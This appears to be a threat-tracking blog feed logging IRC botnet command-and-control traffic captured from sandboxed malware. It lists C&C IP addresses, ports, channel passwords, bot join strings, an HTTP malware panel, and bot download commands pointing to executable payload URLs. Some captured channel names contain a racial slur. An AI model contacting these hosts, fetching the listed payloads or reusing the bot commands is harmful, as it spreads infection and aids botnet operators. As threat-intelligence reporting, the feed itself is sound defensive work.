Author: Pig

Remote Host Port Number 200.55.208.196 21161 NICK raGe|lmLsfSBCBu USER xxwiml “fo9.net” “rage” :xxwiml JOIN #rage rage PONG irc.priv8net.com hosting infos: http://whois.domaintools.com/200.55.208.196

Resolved : [b.itravelindo.com] To [64.151.111.140] Remote Host Port Number 64.151.111.140 4042 NICK new[USA|XP|COMPUTERNAME]pzpmjiu USER xd “” “lol” :xd JOIN #newbiz# Now talking in #newbiz# Topic On: [ #newbiz# ] [ ] Topic By: [ b ] Modes On: [ #newbiz# ] [ +smntu ] Now talking in #newbiz# Topic On: [ #newbiz# ] [ ]Read more...

Remote Host Port Number 199.15.234.7 80 46.249.56.213 8811 PASS ngrBot NICK n{US|XPa}ihsboxr USER ihsboxr 0 0 :ihsboxr PONG :C03D3650 JOIN #paradise klash Now talking in #paradise Topic On: [ #paradise ] [ .dl http://dc460.4shared.com/download/Vev8KBwQ/insomnia.exe?tsid=20111205-151346-2b5ec481 ] Topic By: [ WILLY ] Modes On: [ #paradise ] [ +smntu ] Nick: WILLY is now known as [n{US|VI-64a}ndksjax]Read more...

Remote Host Port Number 188.138.0.84 1686 PASS koka25 199.15.234.7 80 77.74.199.61 80 NICK n{US|XPa}ezhvyeo USER ezhvyeo 0 0 :ezhvyeo JOIN #soaa koka25 JOIN #US PRIVMSG #soaa :[d=”http://77.74.199.61/111222.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 * The data identified by the following URLs was then requested from the remote webRead more...

Remote Host Port Number 199.15.234.7 80 97.74.192.231 8000 PASS passwd NICK n{US|XPa}cmeoubk USER cmeoubk 0 0 :cmeoubk JOIN #b0ts ngrBot hosting infos: http://whois.domaintools.com/97.74.192.231

Remote Host Port Number 178.63.193.161 6667 199.15.234.7 80 NICK New{US-XP-x86}1062264 USER 1062264 “” “1062264” :1062264 MODE New{US-XP-x86}1062264 +iMm JOIN #Boss PONG :irc.foonet.com hosting infos: http://whois.domaintools.com/178.63.193.161

Remote Host Port Number 208.67.252.82 2345 NICK New[USA|00|P|00209] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-4688 * 0 :COMPUTERNAME MODE New[USA|00|P|00209] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.82

Another http malware spreading around Panel:http://188.247.135.32/signin.php Network Activity: Host Name IP Address tretr23.com tretr23.com 188.247.135.32 Download URLs http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com) Outgoing connection to remote server: tretr23.com TCP port 80 Host Name IP Address ytreytre.com ytreytre.com 94.63.240.235 Download URLs http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com) Outgoing connection to remote server: ytreytre.com TCP port 80 Host Name IP Address tretr23.com tretr23.com 188.247.135.32Read more...

Resolved : [negro001.com] To [193.107.16.131] Resolved : [negro001.com] To [92.241.165.152] Remote Host Port Number 199.15.234.7 80 92.241.165.152 8782 ircd here 193.107.16.131 8782 ircd here NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/193.107.16.131

Remote Host Port Number 208.67.252.118 2345 NICK [USA|00|P|65160] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2443 * 0 :COMPUTERNAME MODE [USA|00|P|65160] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.118